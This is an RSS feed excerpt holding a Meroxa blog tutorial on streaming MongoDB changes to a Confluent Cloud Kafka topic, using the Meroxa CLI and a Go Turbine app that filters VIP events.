&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app list&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token output&quot;&gt;ID              NAME           LANGUAGE     STATE
====== ======================= ============ ==========
584           liveapp          javascript   running
2980           fooapp          golang       degraded
3095           barapp          python       running

✨ To visualize your applications, visit https://dashboard.meroxa.io/apps&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Have questions or feedback?&lt;/h3&gt;
&lt;p&gt;We love hearing from our customers! If you have questions or feedback, please feel free to contact us directly at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt; or by &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;joining our Discord community server&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;🚀 We can’t wait to see what you build!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Streaming changes in real-time from MongoDB to Apache Kafka]]></title><description><![CDATA[Learn how to efficiently pull data out of MongoDB in real-time using a Meroxa Turbine data stream processing app.]]></description><link>https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka</link><guid isPermaLink="false">https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Tue, 06 Dec 2022 21:35:10 GMT</pubDate><content:encoded>&lt;p&gt;It’s easy to see the appeal of MongoDB, so it’s no surprise it&apos;s so popular. With the advent of numerous managed providers, the operational burden has also been minimized.&lt;/p&gt;
&lt;p&gt;One problem that has not really been solved that well, is the ability to pull data out of MongoDB efficiently and in real-time. In our example, we will be moving data from MongoDB to Kafka in real-time.&lt;/p&gt;
&lt;p&gt;This post walks through building a Turbine Data Stream Processing App to do just that.&lt;/p&gt;
&lt;h3&gt;How it works&lt;/h3&gt;
&lt;p&gt;The Turbine Data Stream Processing App works by creating a CDC (Change Data Capture) connector from the platform to a MongoDB Atlas-hosted database. This connector receives changes in real-time and publishes them into the Meroxa Platform in the form of a stream.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/mongodb-to-kafka.png&quot; alt=&quot;mongodb-to-kafka&quot;&gt;&lt;/p&gt;
&lt;p&gt;The Turbine library allows us to write functions to transform and manipulate that data easily. In fact, we can do anything we normally do with a general programming language, such as calling APIs or importing packages and libraries.&lt;/p&gt;
&lt;p&gt;The Turbine framework does the heavy lifting to make that stream of data available to your custom function in a way that’s familiar and easy to reason about.&lt;/p&gt;
&lt;p&gt;In this example, we’re simply filtering out some of the data and pass through the rest to the downstream Kafka cluster.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.mongodb.com/atlas/database&quot;&gt;Mongo DB Instance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;Confluent Cloud Cluster&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://go.dev/doc/install&quot;&gt;Go Lang&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Setup&lt;/h3&gt;
&lt;p&gt;We’ll be using &lt;a href=&quot;https://www.mongodb.com/atlas/database&quot;&gt;MongoDB Atlas&lt;/a&gt; and &lt;a href=&quot;https://www.confluent.io/confluent-cloud/&quot;&gt;Confluent Cloud&lt;/a&gt; in this example. Both services provide free trials and/or free plans making it easy for you to create accounts and follow along if you don’t already have one.&lt;/p&gt;
&lt;p&gt;Once you’ve created a MongoDB Atlas account, you can create a free &lt;em&gt;shared&lt;/em&gt; cluster. This will be enough for the purposes of testing out this application.&lt;/p&gt;
&lt;p&gt;💡 Refer to the MongoDB Atlas documentation &lt;a href=&quot;https://www.mongodb.com/docs/atlas/getting-started/&quot;&gt;here&lt;/a&gt; to set up a free shared cluster.&lt;/p&gt;
&lt;p&gt;Similarly, you can use the *basic *****Kafka plan on Confluent Cloud.&lt;/p&gt;
&lt;p&gt;💡 Refer to Meroxa’s guide &lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;here&lt;/a&gt; to set up a Confluent Cloud account&lt;/p&gt;
&lt;p&gt;Next, we’ll initialize the Data Stream Processing App via the Meroxa CLI. If you need to create an account on Meroxa, you can &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme&quot;&gt;request a demo&lt;/a&gt;. Once you have created a &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa&lt;/a&gt; account and set up the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt; you need to add your resources and initialize a Turbine Data Stream Processing App.&lt;/p&gt;
&lt;p&gt;First, we will add the resources. Below, we are using the Meroxa CLI to add our MongoDB Atlas instance and Confluent Cloud instance. Alternatively, you can also do this via the &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Meroxa Dashboard&lt;/a&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create mdb &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type mongodb \\
  --url &quot;mongodb://$MONGO_USER:$MONGO_PASS@$MONGO_URL:$MONGO_PORT&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create cck &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type confluentcloud \\
  --url &quot;kafka+sasl+ssl://$API_KEY:$API_SECRET@$BOOTSTRAP_SERVER?sasl_mechanism=plain&quot; \\&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, we create a new Turbine App project (in Go) in the directory &lt;code class=&quot;language-text&quot;&gt;marketplace-notifier&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; go marketplace-notifier  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 If you prefer to use another language, Meroxa also supports &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/javascript/&quot;&gt;Javascript&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python/&quot;&gt;Python&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby/&quot;&gt;Ruby&lt;/a&gt; with support for many more languages coming!&lt;/p&gt;
&lt;p&gt;Now we’re all set to start implementing our Data Stream Processing App.&lt;/p&gt;
&lt;h3&gt;Data Stream Processing App&lt;/h3&gt;
&lt;p&gt;All Turbine Data Stream Processing Apps consist of two main parts. The pipeline topology part (where we define the components that make up the data pipeline, including Resources, Sources, Destinations, Processors etc…) and the function part (where we can implement any custom logic that’s needed).&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a App&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Turbine&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// reference the MongoDB resource that was created on the platform. In this case I created &quot;mdb&quot;.&lt;/span&gt;
  source&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;mdb&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// pull records from the &quot;events&quot; collection.&lt;/span&gt;
  rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;events&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// apply the &quot;FilterInteresting&quot; processor to those records.&lt;/span&gt;
  res &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; FilterNotify&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// reference the Kafka resource that was created on the platform. In this case I created &quot;cck&quot;.&lt;/span&gt;
  dest&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cck&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// write out the resulting records into the collection (or __Topic__ in the case of Kafka). In this case I&apos;m writing&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// out to the Topic &quot;interesting_events&quot;.&lt;/span&gt;
  err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; dest&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;WriteWithConfig&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;res&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;notifications&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here’s the entirety of the &lt;code class=&quot;language-text&quot;&gt;Run&lt;/code&gt; method. Here we can see that we’re grabbing references to the MongoDB resource &lt;code class=&quot;language-text&quot;&gt;mdb&lt;/code&gt; we created above, pulling records out of it from the collection &lt;code class=&quot;language-text&quot;&gt;events&lt;/code&gt;, piping those records through a processor &lt;code class=&quot;language-text&quot;&gt;FilterNotify&lt;/code&gt; and then ultimately writing it out into the topic &lt;code class=&quot;language-text&quot;&gt;notifications&lt;/code&gt; on the Kafka resource &lt;code class=&quot;language-text&quot;&gt;cck&lt;/code&gt; (also created above).&lt;/p&gt;
&lt;h3&gt;Processing Data&lt;/h3&gt;
&lt;p&gt;The actual business logic of our Turbine Application is relatively straightforward. We loop through the slice of records and if a particular event includes a “vip:true” then we call out to an external service to notify the appropriate user.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// FilterInteresting looks for &quot;interesting&quot; events and filters out everything else.&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;// For this example, __interesting__ events are any events where an event is associated with a VIP user.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; FilterInteresting &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;f FilterInteresting&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;stream &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; interestingEvents &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;Event
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; stream &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		ev&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;parseEventRecord&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error: %s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;break&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;isInteresting&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ev&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			interestingEvents &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;append&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;interestingEvents&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ev&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;interestingEvents&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		recs&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;encodeEvents&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;interestingEvents&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error: %s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; recs
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// Event represents the Event document stored in MongoDB.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Event &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	UserID    &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;    &lt;span class=&quot;token string&quot;&gt;`json:&quot;user_id&quot;`&lt;/span&gt;
	Activity  &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;    &lt;span class=&quot;token string&quot;&gt;`json:&quot;activity&quot;`&lt;/span&gt;
	VIP       &lt;span class=&quot;token builtin&quot;&gt;bool&lt;/span&gt;      &lt;span class=&quot;token string&quot;&gt;`json:&quot;vip&quot;`&lt;/span&gt;
	CreatedAt time&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Time &lt;span class=&quot;token string&quot;&gt;`json:&quot;created_at&quot;`&lt;/span&gt;
	UpdatedAt time&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Time &lt;span class=&quot;token string&quot;&gt;`json:&quot;updated_at&quot;`&lt;/span&gt;
	DeletedAt time&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Time &lt;span class=&quot;token string&quot;&gt;`json:&quot;deleted_at&quot;`&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Demo&lt;/h3&gt;
&lt;p&gt;Meroxa allows developers to test their code locally via fixtures. Fixtures are a JSON representation of the data that the Turbine library will process. In our &lt;a href=&quot;https://github.com/ahmeroxa/turbine-mongo-kafka-demo/blob/main/fixtures/mdb.json&quot;&gt;example&lt;/a&gt;, we have a single record to represent what the Data Stream Processing App will read from MongoDB and write to Kafka if the &lt;code class=&quot;language-text&quot;&gt;FilterInteresting&lt;/code&gt; function returns an “interesting” event. To run locally, you can run the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps run  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We will get the following output:&lt;/p&gt;
&lt;p&gt;Here we can see that 1 record was written to the &lt;code class=&quot;language-text&quot;&gt;cck&lt;/code&gt; resource, which matched our criteria in our code. Once you are happy with your code we can deploy the app live to read and write with your actual resources. To deploy your app live you can run the following commands:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 For more information on deployment, you can refer to the Meroxa Docs &lt;a href=&quot;https://docs.meroxa.com/turbine/deployment&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Once your app is deployed, you will see that every record in your MongoDB has been processed and has been written to your Kafka topic. As records come into your data source (MongoDb in this example), your Turbine app running on the Meroxa platform will process each record in real-time.&lt;/p&gt;
&lt;p&gt;Meroxa sets up all the connections and removes the complexities, so you, the developer, can focus on the important stuff.&lt;/p&gt;
&lt;h3&gt;Next Steps&lt;/h3&gt;
&lt;p&gt;Now that the Turbine Data Stream Processing App has been deployed we can extend the app with additional Destinations. This allows us to also persist the end results into an audit table or data warehouse for additional tracking and analysis.&lt;/p&gt;
&lt;p&gt;To add additional Destinations you would simply create the resource, reference it (e.g. &lt;code class=&quot;language-text&quot;&gt;app.resource(&quot;auditdb&quot;)&lt;/code&gt;) and then &lt;code class=&quot;language-text&quot;&gt;write&lt;/code&gt; to that as well.&lt;/p&gt;
